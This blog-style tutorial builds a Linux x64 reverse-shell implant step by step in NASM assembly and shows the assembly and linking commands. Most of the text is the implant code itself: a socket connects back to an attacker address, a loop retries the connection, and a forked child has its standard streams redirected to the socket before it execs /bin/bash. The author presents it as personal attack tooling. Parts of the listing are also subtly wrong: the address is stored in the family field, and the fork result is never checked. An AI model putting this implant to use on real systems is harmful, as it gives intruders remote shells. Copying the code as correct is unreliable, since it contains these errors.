How I developed x64 reverse shell shellcode

How I developed x64 reverse shell shellcode

Today I was thinking about how many penetration testers use prebuilt implants in order to gain a shell on the target machine. I also often use meterpreter implants on Linux machines because it saves time, and mostly Linuxmachines do not have AV engines on them, so there is no way to detect malicious code automatically.

All of this is good, but sometimes I feel I need to create my own arsenal. Using implants generated by open-source C2 frameworks feels script-kiddie. So, I decided to write my own shellcode for getting reverse shells on x64 Linux platforms.

x64 Linux system call table

Many people say that Linux is an amazing operating system. I disagree. Linux Distros are amazing operating systems. Linux itself is just a kernel. Well, in order to achieve something from the standard user-mode process, we need to get help from the kernel. For example, I can’t create a socket without the kernel’s permission, or I can’t allocate a buffer in the heap without the kernel. There are functions in the kernel that can be and are being used. For example, if I want to output something in the console, I would do this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
section .rodata
message db "Hello, World!", 0
message_size equ $ - message

section .text
global _start

_start:
mov rax, 0x01
mov rdi, 0x01
lea rsi, [message]
mov rdx, message_size
syscall

mov rax, 0x3C
mov rdi, 0x00
syscall

This will output Hello, World! in the console.

Before I start, I would like to explain basic concepts. First of all, every syscall has its own number, not only on Linux but on every OS. Those numbers are available for Linux because it’s open source. BTW, everything is open source if you can read and understand Assembly, so it’s also possible to obtain direct syscall numbers from ntdll.dll functions on Windows.

For example, when using NtCreateUserProcess function directly from ntdll.dll in order to avoid kernel32.dll and kernelbase.dll, it’s possible to read the stub and capture the system call number. That’s because every standard user process talks to the CPU via the chain of DLL files. After kernel32.dll comes kernelbase.dll. Finally, ntdll.dll comes in and does the syscall. A system call is a call to the kernel that asks something from the kernel. For example, creating a socket or allocating a buffer inside the virtual memory of the running process.

So, back to the main topic. Every system call number goes to RAX register. After that, several registers hold important values. Note that the order of additional registers can’t be changed:

  1. rdi
  2. rsi
  3. rdx
  4. r10
  5. r8
  6. r9

Let’s start creating a theoretical model of the shellcode: it tries to connect to the IP address on a specific port. If successful, it spawns a subprocess (child process) and puts /bin/bash inside. If not successful, execution stops. In fact, I’ll add a switch that decides if the shellcode tries to reconnect to the server or not.

I always use https://x64.syscall.sh/ because it’s impossible to remember every system call and its structure.

Writing the code

First of all, I need to implement sockaddr_in structure that’ll hold the information about the server (the device that the shellcode tries to connect to). I’m going to do it like this:

1
2
3
4
5
6
struc sockaddr_in
.sin_family resw 1
.sin_port resw 1
.sin_addr resd 1
.sin_zero resb 8
endstruc

Alright, so here is a structure that holds all the information that’s needed to make a connection. I’ll explain everything below. sin_family is the type of the address. In this case, I’m going to store AF_INET inside, which means IPv4 type. sin_port is just a port number. Note that the order of bytes differs between the host and the network. That’s why in C/C++ people do this:

1
server_addr.sin_port = htons(8080); // 8080 port number for example

htons() means (Host TO Network Short). This converts 8080 number’s byte order from host to network. After that comes sin_addr. This will hold IPv4 address of the target device (attacker’s machine). sin_zero is just a padding, and it’s not important in this case.

After that, I’m going to create pipefds (PIPE file descriptors) inside uninitialized memory to connect the socket and the child process. That connection will redirect commands to /bin/bash and the output of /bin/bash to the socket. Without this, the attacker won’t be able to feed commands to /bin/bash and /bin/bash won’t be able to send the output to the attacker:

1
2
3
section .bss
pipefds:
resq 2

resq is a Quad Word (8 bytes).

Now, it’s time to add read-only data section to write sockaddr_in object and other necessary variables (constants in this case):

1
2
3
4
5
6
7
8
9
10
11
section .rodata
sockaddr istruc sockaddr_in
at sockaddr_in.sin_family, dw 2
at sockaddr_in.sin_port, dw 0x901F
at sockaddr_in.sin_family, dd 0x0100007F
at sockaddr_in.sin_zero, dd 0, 0
iend
sockaddr_in_size equ $ - sockaddr

bash db "/bin/bash", 0
reconnect db 0

Alright, 0x901F is 8080 in network order, and 0x0100007F is 127.0.0.1 in network order. sin_family got 2 as a value, which means AF_INET.

After that, I’ll define .text section that holds actual instructions:

1
2
section .text
global _start

_start label is going to hold all of the code:

1
2
3
4
5
6
7
8
9
10
11
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29
mov rdi, 2
mov rsi, 1
mov rdx, 6
syscall

As you can see, I started writing socket() function’s logic. RAX gets 0x29 which is the number of the system call that belongs to socket function in the kernel. It should get 3 parameters: AF_INET, SOCK_STREAM and IPPROTO_TCP. These tell the kernel that the connection should be over TCP/IPv4 protocols.

BTW, the return value of every function goes into RAX. In this case, if RAX register’s value is going to be an actual file descriptor of a newly created socket. After that, I’m going to store that fd (file descriptor) inside RBX register because I need RAX:

1
2
3
4
5
6
7
8
9
10
11
12
13
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29
mov rdi, 2
mov rsi, 1
mov rdx, 6
syscall

mov rbx, rax

Then, I’ll add _connect label for the loop. This loop will continue until the shellcode manages to connect to the target (if reconnect is enabled):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29
mov rdi, 2
mov rsi, 1
mov rdx, 6
syscall

mov rbx, rax

_connect:
mov rax, 0x2A
mov rdi, rbx
lea rsi, [sockaddr]
mov rdx, sockaddr_in_size
syscall

Below, I call connect function that also takes 3 parameters. The first parameter is the fd of the socket that we already created, the second parameter is sockaddr object created in rodata section, and the final parameter is the size of that object. Note that I’m not using mov instruction to load the object inside RSI register. That’s because RSI is not large enough to hold that value. So, I load the offset memory address of that object by using LEA (Load Effective Address) instruction, and the kernel handles the rest.

After this system call, I need to check if the connection was successful:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

mov rax, 0x29
mov rdi, 2
mov rsi, 1
mov rdx, 6
syscall

mov rbx, rax

_connect:
mov rax, 0x2A
mov rdi, rbx
lea rsi, [sockaddr]
mov rdx, sockaddr_in_size
syscall

mov rdx, rax
movzx rcx, byte [reconnect]
and rdx, rcx
test rdx, rdx
jnz _connect

Here, I check if the connection was unsuccessful and reconnect is disabled. If reconnect is enabled but the connection was unsuccessful, the CPU will jump to _connect label, so execution continues from there. It’s a loop. If reconnect is disabled during assembling the shellcode and the connection was unsuccessful, execution stops.

Now, I need to use fork() system call to spawn a child process, and then I must put /bin/bash inside with no parameters and environment. Before I put /bin/bash there, I must redirect STDIN, STDOUT and STDERR to the socket.

First of all, let’s do fork:

1
2
3
4
5
mov rax, 0x39
syscall

cmp rax, -1
je _end

_end label is not yet defined, but it’s alright. 0x39 is the number of the system call that belongs to fork() and it does not need to have any parameters at all.

After that, I must call dup2 three times. This system call duplicates pipes, so standard input, output, and error streams are going to be connected to the socket:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
mov rax, 0x21
mov rdi, rbx
mov rsi, 0
syscall

mov rax, 0x21
mov rdi, rbx
mov rsi, 1
syscall

mov rax, 0x21
mov rdi, rbx
mov rsi, 2
syscall

Note that RBX stores the socket fd and 0, 1 and 2 are standard input streams: STDIN, STDOUT and STDERR.

Now, child processes’ standard input streams are connected to the socket fd. That means the attacker can send the data to the child process (it holds /bin/bash) and receive output/error accordingly. The only thing that’s left is to add execve system call. This system call does the actual execution:

1
2
3
4
5
mov rax, 0x3B
lea rdi, [bash]
xor rsi, rsi
xor rdx, rdx
syscall

Finally, I must add _end section to complete the shellcode. This section will hold the logic for closing the socket fd and the program itself:

1
2
3
4
5
6
7
8
_end:
mov rax, 0x03
mov rdi, rbx
syscall

mov rax, 0x3C
mov rdi, 0x00
syscall

Assembling the shellcode to get .elf file

Everything is done. I just have to do a “compilation” process. First of all, I’m going to use nasm assembler to create .o file (object file that needs to be linked), and then I’m going to use ld to link the object file and get the final result (.elf file):

1
2
nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode.elf

Of course, sin_addr, sin_port and reconnect should be changed to match the scenario. Right now, this code just tries to connect localhost:8080 and if it fails, it just stops the execution.

The full source code is available on my GitHub.